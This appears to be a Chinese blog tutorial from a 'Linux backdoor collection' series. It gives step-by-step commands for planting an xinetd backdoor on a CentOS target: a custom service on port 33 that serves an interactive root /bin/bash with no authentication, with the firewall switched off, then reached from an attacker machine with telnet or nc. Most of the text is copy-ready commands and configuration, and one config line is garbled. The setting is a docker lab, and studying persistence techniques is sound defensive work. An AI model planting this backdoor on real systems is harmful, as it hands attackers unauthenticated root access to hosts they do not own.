Linux后门大全-xinetd后门(二)

环境

靶机:centos7.6

攻击机:Linux

使用docker搭建靶机环境,当然也可以不使用docker,直接跳过创建容器的步骤即可

创建容器

bash 复制代码
#创建名为backdoorT4的特权容器,并使用/usr/sbin/init,因为容器默认不开启system服务,所以得使用特权容器开启,不然后续无法使用systemctl命令
docker run -itd --name backdoorT4 --privileged=true centos:7.6.1810 /usr/sbin/init
# 检查容器创建结果
docker ps -a|grep "backdoorT4"
#进入容器
docker exec -it backdoorT4 /bin/bash

安装xinetd

bash 复制代码
#在容器内执行:
yum install xinetd -y
#也可以安装firewalld,后续可以使用这个关闭防火墙,或者使用iptables
yum install firewalld -y

修改配置并启动

  • 首先需要自定义一个服务并绑定
bash 复制代码
#自定义一个名为testcn的服务,绑定端口为33,协议tcp,当然你也可以自定义其他名字和端口,切勿与现有的重复
echo "testcn          33/tcp" >> /etc/services
#检查添加结果
cat /etc/services |grep "testcn"
  • 修改xinetd配置
bash 复制代码
#创建配置文件并添加内容
cat > /etc/xinetd.d/testcn << EOF  #根据自己定义的服务名相应的修改文件名
{
        disable         = no				#开启
        id              = testcn-stream	
        wait            = no		
        socket_type     = stream			#使用tcp,如果使用udp,修改成dgram
        protocol        =  socket type is usually enough
        user            = root
        server          = /bin/bash			#此属性为执行程序,下一个属性为其参数,合在一起的意思就是/bin/bash -i,提供一个交互式shell
        server_args     = -i
        port            = 33				#监听端口,服务绑定的是哪个就填哪个
}
EOF
#启动
systemctl start xinetd
#要使得后门生效一定要让防火墙放开相应得端口,这里的端口号是33。防火墙开放端口的命令太长不记得了,直接关闭防火墙也可以
systemctl status firewalld
#检查xinetd进程和端口33是否启动了
netstat -ltupan|grep xinetd
tcp6       0      0 :::33                   :::*                    LISTEN      5567/xinetd

连接后门

使用攻击机访问靶机的端口。有很多种方法可以连接。一般的,只要支持tcp协议的工具都能连接

bash 复制代码
#在攻击机上执行
#1.使用telnet连接
telnet  172.17.0.2 33
#连接成功后就可以执行其他命令了

#2.使用nc连接
nc -v 172.17.0.2 33

至此,此后门的使用方法您已经学会了!!!
注:如果操作系统不好安装,可以尝试使用docker安装,方便快捷。

相关推荐
RisunJan16 分钟前
Linux命令-rlogin(远程登录)
linux·运维
xixixi777771 小时前
产业全景解读:太空算力、国产芯、国产大模型、6G 空天地、AI 可信身份、后量子安全多线全面突破
人工智能·安全·ai·大模型·数据中心·通信·运营商
m0_466525292 小时前
新品发布 | 绿盟安全智算一体机,构建“算力、调度、安全“深度融合的AI基础设施
人工智能·安全
hz567892 小时前
内网视频会议系统建设方案:适合政企单位的安全会议选择
安全·云计算·音视频·实时音视频·信息与通信
2603_954708313 小时前
全维度容错设计,打造微电网安全运行屏障
服务器·网络·数据库·人工智能·分布式·安全
大飞记Python3 小时前
Linux命令速查手册(测试开发4年实战总结,附PDF)
linux·网络·pdf
冰茶丿4 小时前
嵌入式安全第一关:Secure Boot是怎么保护你的设备的?
嵌入式硬件·安全
顾喵5 小时前
PetaLinux 2017.4 实操指南:PREEMPT_RT实时补丁移植+Zynq PL中断UIO用户态配置(超完整避坑版)
linux
长风2305 小时前
Day14: 极限异常演练 —— 验证系统韧性与错误告警生成
人工智能·安全
小樱花的樱花5 小时前
Linux 线程的创建
linux·c语言·开发语言